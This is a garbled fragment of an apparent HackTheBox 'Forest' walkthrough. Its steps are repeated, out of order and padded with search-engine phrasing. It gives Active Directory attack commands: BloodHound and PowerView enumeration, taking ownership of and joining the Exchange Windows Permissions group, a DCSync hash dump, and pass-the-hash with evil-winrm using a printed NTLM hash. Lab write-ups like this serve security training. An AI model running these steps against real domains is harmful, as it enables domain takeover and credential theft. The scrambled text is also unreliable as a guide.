The known attack: privilege on the Exchange Windows Permissions group.
whoami /all net user svc-alfresco We see the user belongs to Service Accounts and Privileged IT Accounts , but more importantly, we need to check group memberships recursively. Upload SharpHound.exe or use BloodHound.py from Kali: forest hackthebox walkthrough best
aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90f43dfa1e816ec0a1c8 Use evil-winrm again with the administrator hash: The known attack: privilege on the Exchange Windows
If you are searching for the , you have come to the right place. We will cover enumeration, AS-REP roasting, cracking hashes, WinRM access, and finally abusing WriteOwner privileges to compromise the domain. We will cover enumeration, AS-REP roasting, cracking hashes,
Add-DomainGroupMember -Identity "Exchange Windows Permissions" -Member "svc-alfresco" Get-DomainGroupMember -Identity "Exchange Windows Permissions"
# Upload PowerView.ps1 upload /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/powerview.ps1 Import-Module .\powerview.ps1 Take ownership of the group Set-DomainObjectOwner -Identity "Exchange Windows Permissions" -OwnerIdentity "svc-alfresco" Step 5: Grant DCSync Rights Now that we own the group, we can add ourselves to it. Then, we abuse DCSync to dump domain hashes.
From BloodHound, we see that svc-alfresco has WriteOwner on Exchange Windows Permissions . Use PowerView (upload via WinRM) or net commands: